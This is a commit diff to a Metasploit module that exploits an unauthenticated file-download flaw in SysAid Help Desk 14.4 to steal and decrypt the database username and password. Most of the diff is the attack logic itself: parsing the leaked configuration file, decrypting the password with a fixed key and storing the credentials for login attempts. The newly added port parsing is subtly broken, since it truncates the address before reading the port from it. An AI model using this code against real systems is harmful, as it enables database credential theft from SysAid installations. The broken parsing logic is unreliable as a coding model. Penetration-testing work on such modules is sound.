Fix port parsing and cleanup

Author: jvazquez-r7

modules/auxiliary/admin/http/sysaid_sql_creds.rb

@@ -13,13 +13,12 @@ class Metasploit3 < Msf::Auxiliary
 
   def initialize(info={})
     super(update_info(info,
-      'Name'           => "SysAid Help Desk Database Credentials Disclosure",
+      'Name'           => 'SysAid Help Desk Database Credentials Disclosure',
       'Description' => %q{
-        This module exploits a vulnerability in SysAid Help Desk that allows
-        an unauthenticated user to download arbitrary files from the system. This is
-        used to download the server configuration file that contains the database username
-        and password, which is encrypted with a fixed key.
-        This module has been tested with SysAid 14.4 on Windows and Linux.
+        This module exploits a vulnerability in SysAid Help Desk that allows an unauthenticated
+        user to download arbitrary files from the system. This is used to download the server
+        configuration file that contains the database username and password, which is encrypted
+        with a fixed key. This module has been tested with SysAid 14.4 on Windows and Linux.
         },
       'Author' =>
         [
@@ -28,17 +27,17 @@ def initialize(info={})
       'License' => MSF_LICENSE,
       'References' =>
         [
-          [ 'CVE', '2015-2996' ],
-          [ 'CVE', '2015-2998' ],
-          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt' ],
-          [ 'URL', 'http://seclists.org/fulldisclosure/2015/Jun/8' ]
+          ['CVE', '2015-2996'],
+          ['CVE', '2015-2998'],
+          ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt' ],
+          ['URL', 'http://seclists.org/fulldisclosure/2015/Jun/8']
         ],
       'DisclosureDate' => 'Jun 3 2015'))
 
     register_options(
       [
         OptPort.new('RPORT', [true, 'The target port', 8080]),
-        OptString.new('TARGETURI', [ true,  "SysAid path", '/sysaid']),
+        OptString.new('TARGETURI', [ true, 'SysAid path', '/sysaid']),
       ], self.class)
   end
 
@@ -55,7 +54,6 @@ def decrypt_password (ciphertext)
     plaintext
   end
 
-
   def run
     begin
       res = send_request_cgi({
@@ -66,8 +64,7 @@ def run
         },
       })
     rescue Rex::ConnectionRefused
-      print_error("#{peer} - Could not connect.")
-      return
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect.")
     end
 
     if res && res.code == 200 && res.body.to_s.bytesize != 0
@@ -76,48 +73,57 @@ def run
       database_url = /\<dbUrl\>(.*)\<\/dbUrl\>/.match(res.body.to_s)
       database_type = /\<dbType\>(.*)\<\/dbType\>/.match(res.body.to_s)
 
-      if username && encrypted_password && database_type && database_url
-        username = username.captures[0]
-        encrypted_password = encrypted_password.captures[0]
-        database_url = database_url.captures[0]
-        database_type = database_type.captures[0]
-        password = decrypt_password(encrypted_password[6..encrypted_password.length])
-        credential_core = report_credential_core({
-           password: password,
-           username: username
-        })
-
-        matches = /(\w*):(\w*):\/\/(.*)\/(\w*)/.match(database_url)
-        if matches
-          begin
-            if database_url['localhost'] == 'localhost'
-              db_address = rhost
+      unless username && encrypted_password && database_type && database_url
+        fail_with(Failure::Unknown, "#{peer} - Failed to obtain database credentials.")
+      end
+
+      username = username.captures[0]
+      encrypted_password = encrypted_password.captures[0]
+      database_url = database_url.captures[0]
+      database_type = database_type.captures[0]
+      password = decrypt_password(encrypted_password[6..encrypted_password.length])
+      credential_core = report_credential_core({
+        password: password,
+        username: username
+      })
+
+      matches = /(\w*):(\w*):\/\/(.*)\/(\w*)/.match(database_url)
+      if matches
+        begin
+          if database_url['localhost'] == 'localhost'
+            db_address = matches.captures[2]
+            db_port = db_address[(db_address.index(':') + 1)..(db_address.length - 1)].to_i
+            db_address = rhost
+          else
+            db_address = matches.captures[2]
+            if db_address.index(':')
+              db_address = db_address[0, db_address.index(':')]
+              db_port = db_address[db_address.index(':')..(db_address.length - 1)].to_i
             else
-              db_address = matches.captures[2]
-              db_address = (db_address.index(':') ? db_address[0, db_address.index(':')] : db_address)
-              db_address = Rex::Socket.getaddress(db_address, true)
+              db_port = 0
             end
-            database_login_data = {
-              address: db_address,
-              service_name: database_type,
-              protocol: 'tcp',
-              workspace_id: myworkspace_id,
-              core: credential_core,
-              status: Metasploit::Model::Login::Status::UNTRIED
-            }
-            create_credential_login(database_login_data)
-          # Skip creating the Login, but tell the user about it if we cannot resolve the DB Server Hostname
-          rescue SocketError
-            print_error "Could not resolve database server hostname."
+            db_address = Rex::Socket.getaddress(db_address, true)
           end
-
-          print_status("#{peer} - Stored SQL credentials #{username}:#{password} for #{matches.captures[2]}")
-          return
+          database_login_data = {
+            address: db_address,
+            service_name: database_type,
+            protocol: 'tcp',
+            port: db_port,
+            workspace_id: myworkspace_id,
+            core: credential_core,
+            status: Metasploit::Model::Login::Status::UNTRIED
+          }
+          create_credential_login(database_login_data)
+        # Skip creating the Login, but tell the user about it if we cannot resolve the DB Server Hostname
+        rescue SocketError
+          fail_with(Failure::Unknown, 'Could not resolve database server hostname.')
         end
+
+        print_status("#{peer} - Stored SQL credentials #{username}:#{password} for #{matches.captures[2]}")
+        return
       end
-      print_error("#{peer} - Failed to obtain database credentials, response was: #{res.body}")
     else
-      print_error("#{peer} - Failed to obtain database credentials.")
+      fail_with(Failure::NotVulnerable, "#{peer} - Failed to obtain database credentials, response was: #{res.code}")
     end
   end